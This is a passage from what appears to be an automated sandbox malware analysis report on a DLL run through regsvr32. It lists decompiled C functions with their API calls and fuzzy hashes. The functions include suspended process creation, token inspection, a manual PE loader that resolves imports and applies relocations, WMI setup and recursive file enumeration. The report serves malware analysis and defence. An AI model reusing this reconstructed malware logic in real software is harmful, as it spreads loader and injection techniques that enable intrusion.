                  							E1000861A( &_v12, _t16);
                  							goto L3;
                  						}
                  					} else {
                  						L3:
                  						_t12 = 0;
                  					}
                  				}
                  				return _t12;
                  			}











                  APIs
                  • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9B3
                  • GetLastError.KERNEL32(?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9BA
                    • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                  • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9E9
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: InformationToken$AllocErrorHeapLast
                  • String ID:
                  • API String ID: 4258577378-0
                  • Opcode ID: c9dc3b6da51a4adb2593ed558e7881c6b5e21b29452045dd37928f68b6e12adc
                  • Instruction ID: 0e837ad5d344672522dd0af1a739acbaf95446ba78b21159f473d30cfb6f5d1d
                  • Opcode Fuzzy Hash: c9dc3b6da51a4adb2593ed558e7881c6b5e21b29452045dd37928f68b6e12adc
                  • Instruction Fuzzy Hash: 8E01A27260066ABFAB24DFA6CC89D8F7FECEB456E17120225F605D3124E630DE00C7A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 363 1000ae66-1000aeb3 memset CreateProcessW
                  C-Code - Quality: 47%
                  			E1000AE66(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
                  				struct _STARTUPINFOW _v72;
                  				signed int _t11;
                  				WCHAR* _t15;
                  				int _t19;
                  				struct _PROCESS_INFORMATION* _t20;
                  
                  				_t20 = __edx;
                  				_t15 = __ecx;
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				_t19 = 0x44;
                  				memset( &_v72, 0, _t19);
                  				_v72.cb = _t19;
                  				_t11 = CreateProcessW(0, _t15, 0, 0, 0, 4, 0, 0,  &_v72, _t20);
                  				asm("sbb eax, eax");
                  				return  ~( ~_t11) - 1;
                  			}









                  APIs
                  • memset.MSVCRT ref: 1000AE85
                  • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AEA5
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: CreateProcessmemset
                  • String ID:
                  • API String ID: 2296119082-0
                  • Opcode ID: 9215398e04c0e1465519a4e0e52a5396276f524f1bd12603e09a1ebda4c409e5
                  • Instruction ID: 8cd7357356a5339f89587e4f6554bd087a86913dd4092c53185382899a550088
                  • Opcode Fuzzy Hash: 9215398e04c0e1465519a4e0e52a5396276f524f1bd12603e09a1ebda4c409e5
                  • Instruction Fuzzy Hash: 63F012F26041187FF760D6ADDC46EBB77ACC789654F104532FA05D6190E560ED058161
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 364 1000ccc0-1000ccce 365 1000ccd0-1000ccd1 364->365 366 1000cd1f-1000cd32 Sleep 364->366 367 1000ccd3-1000ccdf 365->367 368 1000cce1-1000cce7 367->368 369 1000cd15-1000cd1c 367->369 370 1000ccea-1000ccff lstrcmpi 368->370 369->367 371 1000cd1e 369->371 372 1000cd10-1000cd13 370->372 373 1000cd01-1000cd0c 370->373 371->366 372->369 373->370 374 1000cd0e 373->374 374->369
                  C-Code - Quality: 100%
                  			E1000CCC0(void* __ecx, intOrPtr _a4, signed int _a8) {
                  				CHAR* _v8;
                  				int _t28;
                  				signed int _t31;
                  				signed int _t34;
                  				signed int _t35;
                  				void* _t38;
                  				signed int* _t41;
                  
                  				_t41 = _a8;
                  				_t31 = 0;
                  				if(_t41[1] > 0) {
                  					_t38 = 0;
                  					do {
                  						_t3 =  &(_t41[2]); // 0xe6840d8b
                  						_t34 =  *_t3;
                  						_t35 = 0;
                  						_a8 = 0;
                  						if( *((intOrPtr*)(_t38 + _t34 + 8)) > 0) {
                  							_v8 = _a4 + 0x24;
                  							while(1) {
                  								_t28 = lstrcmpiA(_v8,  *( *((intOrPtr*)(_t38 + _t34 + 0xc)) + _t35 * 4));
                  								_t14 =  &(_t41[2]); // 0xe6840d8b
                  								_t34 =  *_t14;
                  								if(_t28 == 0) {
                  									break;
                  								}
                  								_t35 = _a8 + 1;
                  								_a8 = _t35;
                  								if(_t35 <  *((intOrPtr*)(_t34 + _t38 + 8))) {
                  									continue;
                  								} else {
                  								}
                  								goto L8;
                  							}
                  							 *_t41 =  *_t41 |  *(_t34 + _t38);
                  						}
                  						L8:
                  						_t31 = _t31 + 1;
                  						_t38 = _t38 + 0x10;
                  						_t20 =  &(_t41[1]); // 0x1374ff85
                  					} while (_t31 <  *_t20);
                  				}
                  				Sleep(0xa);
                  				return 1;
                  			}











                  APIs
                  • lstrcmpi.KERNEL32(?,?,00000128,00000000,?,?,?,1000AC0D,?,?), ref: 1000CCF4
                  • Sleep.KERNEL32(0000000A,00000000,?,?,?,1000AC0D,?,?), ref: 1000CD26
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: Sleeplstrcmpi
                  • String ID:
                  • API String ID: 1261054337-0
                  • Opcode ID: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
                  • Instruction ID: cde0d477192250e791ba25b7cb0ca9c4b7eae4faf087914376a22588bee842ac
                  • Opcode Fuzzy Hash: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
                  • Instruction Fuzzy Hash: 21018031600709EFEB10DF69C884D5AB7E5FF843A4725C47AE95A8B215D730E942DB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 375 10005e96-10005eb5 ExitProcess
                  C-Code - Quality: 100%
                  			E10005E96() {
                  				intOrPtr _t3;
                  
                  				_t3 =  *0x1001e684; // 0x2c2faa0
                  				 *((intOrPtr*)(_t3 + 0x2c))( *0x1001e6a8, 0xffffffff);
                  				ExitProcess(0);
                  			}





                  APIs
                  • ExitProcess.KERNEL32(00000000), ref: 10005EAD
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: ExitProcess
                  • String ID:
                  • API String ID: 621844428-0
                  • Opcode ID: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
                  • Instruction ID: 9fe5a48d1d7df1d44c8ff89900a8b99800cce3c20b8b2062506d45ae6f81fc06
                  • Opcode Fuzzy Hash: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
                  • Instruction Fuzzy Hash: D4C002712151A1AFEA409BA4CD88F0877A1AB68362F9282A5F5259A1F6CA30D8009B11
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 377 100085ef-10008603 HeapCreate
                  C-Code - Quality: 100%
                  			E100085EF() {
                  				void* _t1;
                  
                  				_t1 = HeapCreate(0, 0x80000, 0); // executed
                  				 *0x1001e768 = _t1;
                  				return _t1;
                  			}





                  APIs
                  • HeapCreate.KERNEL32(00000000,00080000,00000000,10005FA7), ref: 100085F8
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: CreateHeap
                  • String ID:
                  • API String ID: 10892065-0
                  • Opcode ID: 21e30d703b760380db77e66f3654ad7d37bd304b680c7c4cfdef8daab914962f
                  • Instruction ID: f703af9baad619bee9f37dfa55c6143b3da77678d96310d0b12c6411cce6613a
                  • Opcode Fuzzy Hash: 21e30d703b760380db77e66f3654ad7d37bd304b680c7c4cfdef8daab914962f
                  • Instruction Fuzzy Hash: B9B012B0A8471096F2901B204C86B047550A308B0AF308001F708581D0C6B05104CB14
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 47%
                  			E1000BA62(void* __ecx, void* __esi) {
                  				intOrPtr* _v8;
                  				char _v12;
                  				void* _v16;
                  				char _v20;
                  				char _v24;
                  				short _v28;
                  				char _v32;
                  				void* _t20;
                  				intOrPtr* _t21;
                  				intOrPtr _t29;
                  				intOrPtr _t31;
                  				intOrPtr* _t33;
                  				intOrPtr _t34;
                  				char _t37;
                  				union _TOKEN_INFORMATION_CLASS _t44;
                  				char _t45;
                  				intOrPtr* _t48;
                  
                  				_t37 = 0;
                  				_v28 = 0x500;
                  				_t45 = 0;
                  				_v32 = 0;
                  				_t20 = E1000B946(__ecx);
                  				_v16 = _t20;
                  				if(_t20 != 0) {
                  					_push( &_v24);
                  					_t44 = 2;
                  					_t21 = E1000B998(_t44); // executed
                  					_t48 = _t21;
                  					_v20 = _t48;
                  					if(_t48 == 0) {
                  						L10:
                  						CloseHandle(_v16);
                  						if(_t48 != 0) {
                  							E1000861A( &_v20, _t37);
                  						}
                  						return _t45;
                  					}
                  					_push( &_v12);
                  					_push(0);
                  					_push(0);
                  					_push(0);
                  					_push(0);
                  					_push(0);
                  					_push(0);
                  					_push(0x220);
                  					_push(0x20);
                  					_push(2);
                  					_push( &_v32);
                  					_t29 =  *0x1001e68c; // 0x2c2fc68
                  					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
                  						goto L10;
                  					}
                  					if( *_t48 <= 0) {
                  						L9:
                  						_t31 =  *0x1001e68c; // 0x2c2fc68
                  						 *((intOrPtr*)(_t31 + 0x10))(_v12);
                  						_t37 = 0;
                  						goto L10;
                  					}
                  					_t9 = _t48 + 4; // 0x4
                  					_t33 = _t9;
                  					_v8 = _t33;
                  					while(1) {
                  						_push(_v12);
                  						_push( *_t33);
                  						_t34 =  *0x1001e68c; // 0x2c2fc68
                  						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
                  							break;
                  						}
                  						_t37 = _t37 + 1;
                  						_t33 = _v8 + 8;
                  						_v8 = _t33;
                  						if(_t37 <  *_t48) {
                  							continue;
                  						}
                  						goto L9;
                  					}
                  					_t45 = 1;
                  					goto L9;
                  				}
                  				return _t20;
                  			}





















                  APIs
                    • Part of subcall function 1000B946: GetCurrentThread.KERNEL32(00000008,00000000,10000000,00000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B959
                    • Part of subcall function 1000B946: OpenThreadToken.ADVAPI32(00000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B960
                    • Part of subcall function 1000B946: GetLastError.KERNEL32(?,?,1000BA7C,74EC17D9,10000000), ref: 1000B967
                    • Part of subcall function 1000B946: GetCurrentProcess.KERNEL32(00000008,10000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B980
                    • Part of subcall function 1000B946: OpenProcessToken.ADVAPI32(00000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B987
                    • Part of subcall function 1000B998: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9B3
                    • Part of subcall function 1000B998: GetLastError.KERNEL32(?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9BA
                  • CloseHandle.KERNEL32(?,00000000,74EC17D9,10000000), ref: 1000BB06
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: Token$CurrentErrorLastOpenProcessThread$CloseHandleInformation
                  • String ID:
                  • API String ID: 1020899596-0
                  • Opcode ID: 3029ab77cace5704be6ef2a1eb7c1f1fb731f9b7037353be42344427220f5465
                  • Instruction ID: 211ecb97cd29a0990eca88f75de2d619fb9b913ff1731f7459bcb712159e1349
                  • Opcode Fuzzy Hash: 3029ab77cace5704be6ef2a1eb7c1f1fb731f9b7037353be42344427220f5465
                  • Instruction Fuzzy Hash: A5217F71A00615AFEB00DFA9CC85EAEB7F8EF04380F514069F601E7165D770ED008B51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E1000BA05() {
                  				signed int _v8;
                  				signed int _v12;
                  				intOrPtr _t15;
                  				void* _t16;
                  				void* _t18;
                  				void* _t21;
                  				intOrPtr _t22;
                  				void* _t24;
                  				void* _t30;
                  
                  				_v8 = _v8 & 0x00000000;
                  				_t15 =  *0x1001e68c; // 0x2c2fc68
                  				_t16 =  *((intOrPtr*)(_t15 + 0x70))(_t24, 8,  &_v8, _t24, _t24);
                  				if(_t16 != 0) {
                  					_v12 = _v12 & 0x00000000;
                  					_t18 = E1000B998(1,  &_v12); // executed
                  					_t30 = _t18;
                  					if(_t30 != 0) {
                  						CloseHandle(_v8);
                  						_t21 = _t30;
                  					} else {
                  						if(_v8 != _t18) {
                  							_t22 =  *0x1001e684; // 0x2c2faa0
                  							 *((intOrPtr*)(_t22 + 0x30))(_v8);
                  						}
                  						_t21 = 0;
                  					}
                  					return _t21;
                  				} else {
                  					return _t16;
                  				}
                  			}

                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cf8ea1d0ee699ffff2a7d6578a9032d28315730fc6a38588bf4ed6563c659023
                  • Instruction ID: 27834edd58ae92e11893d12f29fcf0d32ff10038b2ecb69362011e86f4a7d187
                  • Opcode Fuzzy Hash: cf8ea1d0ee699ffff2a7d6578a9032d28315730fc6a38588bf4ed6563c659023
                  • Instruction Fuzzy Hash: 58F06432A10619EFEB10DBA4C98AE9E77F8EB453D9F5280A8F001E7155EB70DE009B51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  C-Code - Quality: 30%
                  			E1000D523(void* __ecx) {
                  				char _v8;
                  				void* _v12;
                  				char* _t15;
                  				intOrPtr* _t16;
                  				void* _t21;
                  				intOrPtr* _t23;
                  				intOrPtr* _t24;
                  				intOrPtr* _t25;
                  				void* _t30;
                  				void* _t33;
                  
                  				_v12 = 0;
                  				_v8 = 0;
                  				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
                  				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
                  				_t15 =  &_v12;
                  				__imp__CoCreateInstance(0x1001b848, 0, 1, 0x1001b858, _t15);
                  				if(_t15 < 0) {
                  					L5:
                  					_t23 = _v8;
                  					if(_t23 != 0) {
                  						 *((intOrPtr*)( *_t23 + 8))(_t23);
                  					}
                  					_t24 = _v12;
                  					if(_t24 != 0) {
                  						 *((intOrPtr*)( *_t24 + 8))(_t24);
                  					}
                  					_t16 = 0;
                  				} else {
                  					__imp__#2(__ecx);
                  					_t25 = _v12;
                  					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
                  					if(_t21 < 0) {
                  						goto L5;
                  					} else {
                  						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
                  						if(_t21 < 0) {
                  							goto L5;
                  						} else {
                  							_t16 = E10008604(8);
                  							if(_t16 == 0) {
                  								goto L5;
                  							} else {
                  								 *((intOrPtr*)(_t16 + 4)) = _v12;
                  								 *_t16 = _v8;
                  							}
                  						}
                  					}
                  				}
                  				return _t16;
                  			}

                  APIs
                  • CoInitializeEx.OLE32(00000000,00000000), ref: 1000D536
                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 1000D547
                  • CoCreateInstance.OLE32(1001B848,00000000,00000001,1001B858,?), ref: 1000D55E
                  • SysAllocString.OLEAUT32(00000000), ref: 1000D569
                  • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 1000D594
                    • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: AllocInitialize$BlanketCreateHeapInstanceProxySecurityString
                  • String ID:
                  • API String ID: 2855449287-0
                  • Opcode ID: 9c71082fa761bd29d2373c9429704b0bd8b8f761e3a30b2ff640eaa1795f1f5f
                  • Instruction ID: 5bbdf4e47082d7f099f202f2147c83233ba5ae9393f0558d240139af4bbb2059
                  • Opcode Fuzzy Hash: 9c71082fa761bd29d2373c9429704b0bd8b8f761e3a30b2ff640eaa1795f1f5f
                  • Instruction Fuzzy Hash: A6210931600255BBEB249B66CC4DE6FBFBCEFC6B55F11415EB901A6290DB70DA00CA30
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 52%
                  			E10012AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                  				signed int _v5;
                  				signed short _v12;
                  				intOrPtr* _v16;
                  				signed int* _v20;
                  				intOrPtr _v24;
                  				unsigned int _v28;
                  				signed short* _v32;
                  				struct HINSTANCE__* _v36;
                  				intOrPtr* _v40;
                  				signed short* _v44;
                  				intOrPtr _v48;
                  				unsigned int _v52;
                  				intOrPtr _v56;
                  				_Unknown_base(*)()* _v60;
                  				signed int _v64;
                  				intOrPtr _v68;
                  				intOrPtr _v72;
                  				unsigned int _v76;
                  				intOrPtr _v80;
                  				signed int _v84;
                  				intOrPtr _v88;
                  				signed int _t149;
                  				void* _t189;
                  				signed int _t194;
                  				signed int _t196;
                  				intOrPtr _t236;
                  
                  				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                  				_v24 = _v72;
                  				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
                  				_v56 = _t236;
                  				if(_t236 == 0) {
                  					L13:
                  					while(0 != 0) {
                  					}
                  					_push(8);
                  					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
                  						L35:
                  						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
                  						while(0 != 0) {
                  						}
                  						if(_a12 != 0) {
                  							 *_a12 = _v68;
                  						}
                  						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
                  						return _v68(_a4, 1, _a8);
                  					}
                  					_v84 = 0x80000000;
                  					_t149 = 8;
                  					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
                  					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
                  						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                  						if(_v36 == 0) {
                  							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                  						}
                  						if(_v36 != 0) {
                  							if( *_v16 == 0) {
                  								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
                  							} else {
                  								_v20 =  *_v16 + _a4;
                  							}
                  							_v64 = _v64 & 0x00000000;
                  							while( *_v20 != 0) {
                  								if(( *_v20 & _v84) == 0) {
                  									_v88 =  *_v20 + _a4;
                  									_v60 = GetProcAddress(_v36, _v88 + 2);
                  								} else {
                  									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
                  								}
                  								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
                  									 *_v20 = _v60;
                  								} else {
                  									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
                  								}
                  								_v20 =  &(_v20[1]);
                  								_v64 = _v64 + 4;
                  							}
                  							_v16 = _v16 + 0x14;
                  							continue;
                  						} else {
                  							_t189 = 0xfffffffd;
                  							return _t189;
                  						}
                  					}
                  					goto L35;
                  				}
                  				_t194 = 8;
                  				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
                  				_t196 = 8;
                  				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
                  				while(0 != 0) {
                  				}
                  				while(_v48 > 0) {
                  					_v28 = _v44[2];
                  					_v48 = _v48 - _v28;
                  					_v28 = _v28 - 8;
                  					_v28 = _v28 >> 1;
                  					_v32 =  &(_v44[4]);
                  					_v80 = _a4 +  *_v44;
                  					_v52 = _v28;
                  					while(1) {
                  						_v76 = _v52;
                  						_v52 = _v52 - 1;
                  						if(_v76 == 0) {
                  							break;
                  						}
                  						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
                  						_v12 =  *_v32 & 0xfff;
                  						_v40 = (_v12 & 0x0000ffff) + _v80;
                  						if((_v5 & 0x000000ff) != 3) {
                  							if((_v5 & 0x000000ff) == 0xa) {
                  								 *_v40 =  *_v40 + _v56;
                  							}
                  						} else {
                  							 *_v40 =  *_v40 + _v56;
                  						}
                  						_v32 =  &(_v32[1]);
                  					}
                  					_v44 = _v32;
                  				}
                  				goto L13;
                  			}

                  APIs
                  • GetModuleHandleA.KERNEL32(?), ref: 10012C4C
                  • LoadLibraryA.KERNEL32(?), ref: 10012C65
                  • GetProcAddress.KERNEL32(00000000,890CC483), ref: 10012CC1
                  • GetProcAddress.KERNEL32(00000000,?), ref: 10012CE0
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: AddressProc$HandleLibraryLoadModule
                  • String ID:
                  • API String ID: 384173800-0
                  • Opcode ID: 5436229f79adfd2309291a4696e3cc16a3b33e027d57b62ece0ec2bba77662a7
                  • Instruction ID: 2edd54a6eb651874f6cc264e5dd0ce055865838d2197d7e71e48a8f46057b6f1
                  • Opcode Fuzzy Hash: 5436229f79adfd2309291a4696e3cc16a3b33e027d57b62ece0ec2bba77662a7
                  • Instruction Fuzzy Hash: 62A168B5E00219DFCB40CFA8D881AADBBF1FF08354F108469E915AB351D734EA91CB64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 78%
                  			E1000AEB4(void* __ecx, void* __fp0, intOrPtr _a16) {
                  				char _v12;
                  				WCHAR* _v16;
                  				short _v560;
                  				short _v562;
                  				struct _WIN32_FIND_DATAW _v608;
                  				WCHAR* _t27;
                  				void* _t31;
                  				int _t36;
                  				intOrPtr _t37;
                  				intOrPtr _t44;
                  				void* _t48;
                  				intOrPtr _t49;
                  				void* _t51;
                  				intOrPtr _t56;
                  				void* _t61;
                  				char _t62;
                  				void* _t63;
                  				void* _t64;
                  				void* _t65;
                  				void* _t80;
                  
                  				_t80 = __fp0;
                  				_push(0);
                  				_t51 = __ecx;
                  				_push(L"\\*");
                  				_t27 = E100092E5(__ecx);
                  				_t65 = _t64 + 0xc;
                  				_v16 = _t27;
                  				if(_t27 == 0) {
                  					return _t27;
                  				}
                  				_t61 = FindFirstFileW(_t27,  &_v608);
                  				if(_t61 == 0xffffffff) {
                  					L18:
                  					return E1000861A( &_v16, 0xfffffffe);
                  				}
                  				_t31 = 0x2e;
                  				do {
                  					if(_v608.cFileName != _t31 || _v562 != 0 && (_v562 != _t31 || _v560 != 0)) {
                  						if((_v608.dwFileAttributes & 0x00000010) != 0) {
                  							L14:
                  							_push(0);
                  							_push( &(_v608.cFileName));
                  							_push("\\");
                  							_t62 = E100092E5(_t51);
                  							_t65 = _t65 + 0x10;
                  							_v12 = _t62;
                  							if(_t62 != 0) {
                  								_t56 =  *0x1001e684; // 0x2c2faa0
                  								 *((intOrPtr*)(_t56 + 0xb4))(1);
                  								_push(1);
                  								_push(1);
                  								_push(0);
                  								E1000AEB4(_t62, _t80, 1, 5, E1000EFAA, _a16);
                  								_t65 = _t65 + 0x1c;
                  								E1000861A( &_v12, 0xfffffffe);
                  							}
                  							goto L16;
                  						}
                  						_t63 = 0;
                  						do {
                  							_t10 = _t63 + 0x1001e78c; // 0x0
                  							_push( *_t10);
                  							_push( &(_v608.cFileName));
                  							_t44 =  *0x1001e690; // 0x2c2fd40
                  							if( *((intOrPtr*)(_t44 + 0x18))() == 0) {
                  								goto L12;
                  							}
                  							_t48 = E1000EFAA(_t80, _t51,  &_v608, _a16);
                  							_t65 = _t65 + 0xc;
                  							if(_t48 == 0) {
                  								break;
                  							}
                  							_t49 =  *0x1001e684; // 0x2c2faa0
                  							 *((intOrPtr*)(_t49 + 0xb4))(1);
                  							L12:
                  							_t63 = _t63 + 4;
                  						} while (_t63 < 4);
                  						if((_v608.dwFileAttributes & 0x00000010) == 0) {
                  							goto L16;
                  						}
                  						goto L14;
                  					}
                  					L16:
                  					_t36 = FindNextFileW(_t61,  &_v608);
                  					_t31 = 0x2e;
                  				} while (_t36 != 0);
                  				_t37 =  *0x1001e684; // 0x2c2faa0
                  				 *((intOrPtr*)(_t37 + 0x78))(_t61);
                  				goto L18;
                  			}

                  APIs
                  • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 1000AEE5
                  • FindNextFileW.KERNEL32(00000000,?), ref: 1000AFE6
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
